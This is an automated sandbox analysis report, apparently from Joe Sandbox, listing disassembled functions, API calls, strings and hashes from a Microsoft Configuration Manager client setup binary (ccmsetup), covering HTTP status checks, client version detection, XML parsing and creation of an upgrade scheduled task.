                                                                                          • Instruction Fuzzy Hash: 90418C71D45249EADB00EBE4CD2ABEDBFB5AF15700F148048E5517B2C2DBB41A09DBA1
                                                                                          Function 005EF1EB Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 87threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005EF1F5
                                                                                          • WinHttpQueryHeaders.WINHTTP(00000000,20000013,00000000,?,00000004,00000000), ref: 005EF284
                                                                                          • GetLastError.KERNEL32 ref: 005EF28E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005EF2C7
                                                                                          • WinHttpQueryHeaders.WINHTTP(00000000,00000014,00000000,?,00000200,00000000), ref: 005EF310
                                                                                          Strings
                                                                                          • ..\ccmhttperror.cpp, xrefs: 005EF2B7
                                                                                          • CCMHttpGetResponseStatus, xrefs: 005EF232
                                                                                          • ..\ccmhttperror.cpp, xrefs: 005EF2CF
                                                                                          • <none>, xrefs: 005EF255
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005EF2C2
                                                                                          • WinHttpQueryHeaders( hRequest, 19 | 0x20000000, 0, pdwStatusCode, &dwSize, 0 ), xrefs: 005EF2BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeadersHttpQuery$CurrentErrorH_prolog3_catch_LastThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\ccmhttperror.cpp$..\ccmhttperror.cpp$<none>$CCMHttpGetResponseStatus$WinHttpQueryHeaders( hRequest, 19 | 0x20000000, 0, pdwStatusCode, &dwSize, 0 )
                                                                                          • API String ID: 2782417961-2339376986
                                                                                          • Opcode ID: f1a11a2ec66d7c7fe8bee23a62579ec9119c9c2955e815f1588dcd9ff2c34df7
                                                                                          • Instruction ID: ac4039e96caff6bedae7a5c4524a37f0a32c1986653176611791304cfbbd3185
                                                                                          • Opcode Fuzzy Hash: f1a11a2ec66d7c7fe8bee23a62579ec9119c9c2955e815f1588dcd9ff2c34df7
                                                                                          • Instruction Fuzzy Hash: 4031B771A8125DBBDB20EFA59C4DFDE7AB9BF54710F000095F648A7191DB345A80CBA1
                                                                                          Function 005880D7 Relevance: 17.8, APIs: 4, Strings: 6, Instructions: 255stringthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005880E1
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                          • lstrlenW.KERNEL32(00000008,00000008,000000E8,00588086,00000000,00000000,?,?,?,?,00000001,00000000,00000001,00000000,00000000,?), ref: 0058813B
                                                                                            • Part of subcall function 005F53EA: __EH_prolog3_catch_GS.LIBCMT ref: 005F53F1
                                                                                            • Part of subcall function 005F53EA: GetCurrentThreadId.KERNEL32 ref: 005F54B1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005881D6
                                                                                          • lstrlenW.KERNEL32(/CCM_Client,000000FF,/CCM_Client,00000000,?,?,00000001,?,?,CcmSetup::GetClientOptionalFilesHttp,00000008,000000E8,00588086,00000000,00000000,?), ref: 005883D9
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 005881E2
                                                                                          • CWinHttpHelper::GetDirectoryList_HTTP( sSearchURL, szDPTokenAuth, true, sslCertAuthResult, arrTemp ), xrefs: 005881CC
                                                                                          • CcmSetup::GetClientOptionalFilesHttp, xrefs: 00588159
                                                                                          • /CCM_Client, xrefs: 005883AF, 005883D4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005881D1
                                                                                          • ccmsetup.cpp, xrefs: 005881C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catch_Threadlstrlen$H_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$/CCM_Client$CWinHttpHelper::GetDirectoryList_HTTP( sSearchURL, szDPTokenAuth, true, sslCertAuthResult, arrTemp )$CcmSetup::GetClientOptionalFilesHttp$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 637005874-1542729405
                                                                                          • Opcode ID: c20367e5ae56a0be6bc18048be077850a19350960c2138ce403adae0707f9e0f
                                                                                          • Instruction ID: cf1c158de436a6754911deed4590ae67b9412e33ab61e7f5d85dc8e1e53812ba
                                                                                          • Opcode Fuzzy Hash: c20367e5ae56a0be6bc18048be077850a19350960c2138ce403adae0707f9e0f
                                                                                          • Instruction Fuzzy Hash: F3A19E71904299EADF21EBA4CD49BEEBEB8BF51304F108599E405B3282CB745E45CB21
                                                                                          Function 0057C073 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 145threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057C07A
                                                                                          • GetFileAttributesW.KERNEL32(00000000,?,?,006A17D4,?,CcmSetup::CheckForAvailableSources,00000058), ref: 0057C123
                                                                                          • GetLastError.KERNEL32 ref: 0057C18D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057C201
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesCurrentErrorFileH_prolog3_catch_LastThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CcmSetup::CheckForAvailableSources$Source %s is inaccessible (%lu)$WaitForRunning()$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 1760665454-3206596534
                                                                                          • Opcode ID: 28b207b43b34e01edd1e01f6af2aa29e512ccaa9d6bef8bbc3fa10fc040adc91
                                                                                          • Instruction ID: 7abddffa8c8414ebfea2c01deaa5280871fa3454690692499593b7e1609ead29
                                                                                          • Opcode Fuzzy Hash: 28b207b43b34e01edd1e01f6af2aa29e512ccaa9d6bef8bbc3fa10fc040adc91
                                                                                          • Instruction Fuzzy Hash: 8D519D74A04248AFDF11DFA8D889BDD7FB5BF4A310F148099F459AB282C7709D40DB61
                                                                                          Function 005B82A2 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 143threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B82A9
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B838D
                                                                                            • Part of subcall function 00634BFC: __EH_prolog3_catch.LIBCMT ref: 00634C03
                                                                                            • Part of subcall function 00634BFC: _swscanf.LIBCMT ref: 00634C51
                                                                                            • Part of subcall function 00634BFC: GetCurrentThreadId.KERNEL32 ref: 00634C84
                                                                                            • Part of subcall function 00634BFC: __CxxThrowException@8.LIBCMT ref: 00634D4C
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B8388
                                                                                          • GetProductInstalledByUpgradeCode( c_szClientUpgradeCode, bIsInstalled, sInstalledVersion ), xrefs: 005B8383
                                                                                          • util.cpp, xrefs: 005B8395
                                                                                          • {252DA259-82CA-4177-B8D0-49C78937BA3E}, xrefs: 005B832C
                                                                                          • IsClientInstalled, xrefs: 005B82DD
                                                                                          • util.cpp, xrefs: 005B837D
                                                                                          • An old client with version %s is detected., xrefs: 005B8412
                                                                                          • 5.00.0000.0000, xrefs: 005B82C6
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Exception@8H_prolog3H_prolog3_catchH_prolog3_catch_Throw_swscanf
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$5.00.0000.0000$An old client with version %s is detected.$GetProductInstalledByUpgradeCode( c_szClientUpgradeCode, bIsInstalled, sInstalledVersion )$IsClientInstalled$util.cpp$util.cpp${252DA259-82CA-4177-B8D0-49C78937BA3E}
                                                                                          • API String ID: 4113126383-792981583
                                                                                          • Opcode ID: 4d1fb76c979d2dfc7705189a6c307b8b76dff32e712f808a3b18ef75c1d2e3ea
                                                                                          • Instruction ID: 88a6c972bc82ab9399d7eaaabe316b36beae0cc81476a664561df66fd4c5c71d
                                                                                          • Opcode Fuzzy Hash: 4d1fb76c979d2dfc7705189a6c307b8b76dff32e712f808a3b18ef75c1d2e3ea
                                                                                          • Instruction Fuzzy Hash: 6451C171D09389EADF11DBA8C949BEDBFB9AF55304F24904AE48077242CB742A48DB61
                                                                                          Function 005AA3D1 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 138threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005AA3D8
                                                                                            • Part of subcall function 00576835: __EH_prolog3.LIBCMT ref: 0057683C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AA471
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AA4FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CCM::Utility::XML::Node::getAttribute$H&l$X:\bt\1024777\repo\src\common\inc\ccmxml.h$getAttributes(&spAttribs)$spAttrib.getText(sValue)$spAttribs->getNamedItem( CCM::Utility::BString(pszName), &spAttrib )
                                                                                          • API String ID: 981364226-144156922
                                                                                          • Opcode ID: b3c7b6ce46be13938de9a8cb7223b43d141559c4af114771d1f79ae5c7093927
                                                                                          • Instruction ID: 5cdd2d9c8efdc3083e148934ea2d2d0c249313e69033c504cb8aca13deadfa8c
                                                                                          • Opcode Fuzzy Hash: b3c7b6ce46be13938de9a8cb7223b43d141559c4af114771d1f79ae5c7093927
                                                                                          • Instruction Fuzzy Hash: 8051B070C4024AEBDF11EBA4C94ABEEBF75BF5A714F148048F9017B282C7745A05CBA6
                                                                                          Function 0060A32C Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 127threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060A333
                                                                                            • Part of subcall function 006093A0: __EH_prolog3.LIBCMT ref: 006093A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060A38E
                                                                                            • Part of subcall function 00609505: VariantClear.OLEAUT32(?), ref: 00609512
                                                                                          Strings
                                                                                          • 0 != pDoc2, xrefs: 0060A384
                                                                                          • ..\XmlUtil.cpp, xrefs: 0060A396
                                                                                          • CCM::Utility::XML::ProhibitExternalReferences, xrefs: 0060A348
                                                                                          • XML::ProhibitExternalReferences - Failed to disable DOM external references (0x%08x) - sufficient MSXML version(s) may not be pres, xrefs: 0060A4B5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0060A389
                                                                                          • lu, xrefs: 0060A4A6
                                                                                          • ..\XmlUtil.cpp, xrefs: 0060A37E
                                                                                          • ProhibitDTD, xrefs: 0060A405
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClearCurrentH_prolog3H_prolog3_catchThreadVariant
                                                                                          • String ID: lu$%s, HRESULT=%08lx (%s,%lu)$..\XmlUtil.cpp$..\XmlUtil.cpp$0 != pDoc2$CCM::Utility::XML::ProhibitExternalReferences$ProhibitDTD$XML::ProhibitExternalReferences - Failed to disable DOM external references (0x%08x) - sufficient MSXML version(s) may not be pres
                                                                                          • API String ID: 132144479-694110910
                                                                                          • Opcode ID: 914b53bd3481cfb4ddb027354f2b097bfa01de5456e443eaf7fe4e0e61563b19
                                                                                          • Instruction ID: c5e9cd3824a056f511241c6979e2c41500d024da5269f397bc0e1d378d4d1c50
                                                                                          • Opcode Fuzzy Hash: 914b53bd3481cfb4ddb027354f2b097bfa01de5456e443eaf7fe4e0e61563b19
                                                                                          • Instruction Fuzzy Hash: 8141F371D813599ADB09EBE4C90A7EEBFA26F51740F048048E9447B3C2D7F91A08C7A2
                                                                                          Function 005C647B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 103threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005C6482
                                                                                            • Part of subcall function 005F41CA: __EH_prolog3.LIBCMT ref: 005F41D1
                                                                                            • Part of subcall function 005F4253: __EH_prolog3.LIBCMT ref: 005F425A
                                                                                            • Part of subcall function 005C8CCB: __EH_prolog3_GS.LIBCMT ref: 005C8CD2
                                                                                            • Part of subcall function 005C8CCB: FileTimeToSystemTime.KERNEL32(?,?,?,?,00000060,005C6516,00000000,?,CreateUpgradeWinSchedTask,00000001,00000000,00000001,00000000,?,00000000,/UpgradeWinTask), ref: 005C8D1D
                                                                                            • Part of subcall function 005B80F5: __EH_prolog3_GS.LIBCMT ref: 005B80FC
                                                                                            • Part of subcall function 005B80F5: GetTickCount.KERNEL32 ref: 005B8101
                                                                                            • Part of subcall function 005B80F5: GetCurrentThreadId.KERNEL32 ref: 005B8152
                                                                                            • Part of subcall function 005B80F5: CoCreateGuid.OLE32(?,?), ref: 005B8186
                                                                                          • _rand.LIBCMT ref: 005C651D
                                                                                            • Part of subcall function 005C65E4: __EH_prolog3_catch_GS.LIBCMT ref: 005C65EE
                                                                                            • Part of subcall function 005C65E4: GetCurrentThreadId.KERNEL32 ref: 005C6696
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C6565
                                                                                          Strings
                                                                                          • CreateWinSchedTask(c_szCcmSetupWinTaskName, sArguments, iDelayMinutes, sScheduledTimeUtc), xrefs: 005C655B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005C6560
                                                                                          • /UpgradeWinTask, xrefs: 005C64B6
                                                                                          • wintask.cpp, xrefs: 005C6555
                                                                                          • Configuration Manager Client Upgrade Task, xrefs: 005C6531
                                                                                          • CreateUpgradeWinSchedTask, xrefs: 005C64E9
                                                                                          • wintask.cpp, xrefs: 005C6571
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_H_prolog3_catch_Time$CountCreateFileGuidSystemTick_rand
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$/UpgradeWinTask$Configuration Manager Client Upgrade Task$CreateUpgradeWinSchedTask$CreateWinSchedTask(c_szCcmSetupWinTaskName, sArguments, iDelayMinutes, sScheduledTimeUtc)$wintask.cpp$wintask.cpp
                                                                                          • API String ID: 3653105489-4010604289
                                                                                          • Opcode ID: f07aefc3ea61148972e4997811323eca679c01e143722a3806a7730fc13608c8
                                                                                          • Instruction ID: 74314441491394059b88e538b9f7d9f8b9c16c1b0539fd52a8184119193ce2d8
                                                                                          • Opcode Fuzzy Hash: f07aefc3ea61148972e4997811323eca679c01e143722a3806a7730fc13608c8
                                                                                          • Instruction Fuzzy Hash: 5931AD71E85389EADB10EBE48D0AFED7EA5BF14700F248059F544AB286C7B45B05CBA1
                                                                                          Function 0060919A Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 73COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006091A1
                                                                                            • Part of subcall function 005FDD82: __EH_prolog3_catch_GS.LIBCMT ref: 005FDD8C
                                                                                            • Part of subcall function 005FDD82: GetCurrentThreadId.KERNEL32 ref: 005FDE5C
                                                                                          Strings
                                                                                          • param ( [switch] $CheckComplianceOnly = $false)# Variables[System.Int32]$policyBinaryTimeoutSeconds = 300[System.Int32]$, xrefs: 006091D1
                                                                                          • <Ku, xrefs: 006091FF
                                                                                          • CCM::ManagedInstaller::AddManagedInstallerPolicyForCCM, xrefs: 006091AF
                                                                                          • @Lu, xrefs: 00609261
                                                                                          • %s HRESULT(0x%08x), xrefs: 0060920F
                                                                                          • 6, xrefs: 00609206
                                                                                          • >, xrefs: 00609268
                                                                                          • Managed installer script failed. Managed install policy set failed. Exit Code (%d), xrefs: 00609241
                                                                                          • Unable to execute powershell. Managed install policy set failed., xrefs: 006091E1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchH_prolog3_catch_Thread
                                                                                          • String ID: %s HRESULT(0x%08x)$6$<Ku$>$@Lu$CCM::ManagedInstaller::AddManagedInstallerPolicyForCCM$Managed installer script failed. Managed install policy set failed. Exit Code (%d)$Unable to execute powershell. Managed install policy set failed.$param ( [switch] $CheckComplianceOnly = $false)# Variables[System.Int32]$policyBinaryTimeoutSeconds = 300[System.Int32]$
                                                                                          • API String ID: 1198108500-2785532472
                                                                                          • Opcode ID: a6c12365a8bde0e336518a5ed5ae407ebf797931e880a68ef8dec59894da4ed2
                                                                                          • Instruction ID: 6cc92db2417591d05c1d80dadbc0b991d6f64069045eb7a857701e5278acfff6
                                                                                          • Opcode Fuzzy Hash: a6c12365a8bde0e336518a5ed5ae407ebf797931e880a68ef8dec59894da4ed2
                                                                                          • Instruction Fuzzy Hash: 7921EF72D91209BBCB21DBA4C80ABDEBEB6AF51315F044059FA5077281C7B84A48CBE1
                                                                                          Function 0059D262 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 257COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0059D26C
                                                                                            • Part of subcall function 00576C52: __EH_prolog3.LIBCMT ref: 00576C59
                                                                                            • Part of subcall function 0058C6B5: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00576B90,?,?,00576BBF,00000004,0057100A), ref: 0058C6BC
                                                                                            • Part of subcall function 0058C6B5: GetLastError.KERNEL32(?,00576B90,?,?,00576BBF,00000004,0057100A), ref: 0058C6C6
                                                                                          • GetModuleFileNameW.KERNEL32(00570000,?,00000104), ref: 0059D2EE
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0059D346
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0059D437
                                                                                          • GetModuleFileNameW.KERNEL32(00570000,?,00000104), ref: 0059D4BC
                                                                                            • Part of subcall function 00579005: __EH_prolog3.LIBCMT ref: 0057900C
                                                                                            • Part of subcall function 00579005: EnterCriticalSection.KERNEL32(?,?,?,?,00000000), ref: 00579024
                                                                                            • Part of subcall function 00579005: LeaveCriticalSection.KERNEL32(?,?,?,?,00000000), ref: 00579043
                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0059D517
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Module$CriticalSection$FileH_prolog3H_prolog3_HandleName$CountEnterErrorInitializeLastLeaveSpin
                                                                                          • String ID: Module$Module_Raw$REGISTRY
                                                                                          • API String ID: 3285820555-549000027
                                                                                          • Opcode ID: 4f6131c97a4b06b177c53d33873f9151be17d0e0e35ffc309e932257485410ca
                                                                                          • Instruction ID: 6463ee594031864331b4dba23ab675a6babeefb41157a5b62c155527a595dc39
                                                                                          • Opcode Fuzzy Hash: 4f6131c97a4b06b177c53d33873f9151be17d0e0e35ffc309e932257485410ca
                                                                                          • Instruction Fuzzy Hash: 59A1C4729003299ADF20DBA4CC48BEE7BB8BF55310F1444A6E949E3141D775AF44DBB2
                                                                                          Function 005EE0F8 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 143COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005EE0FF
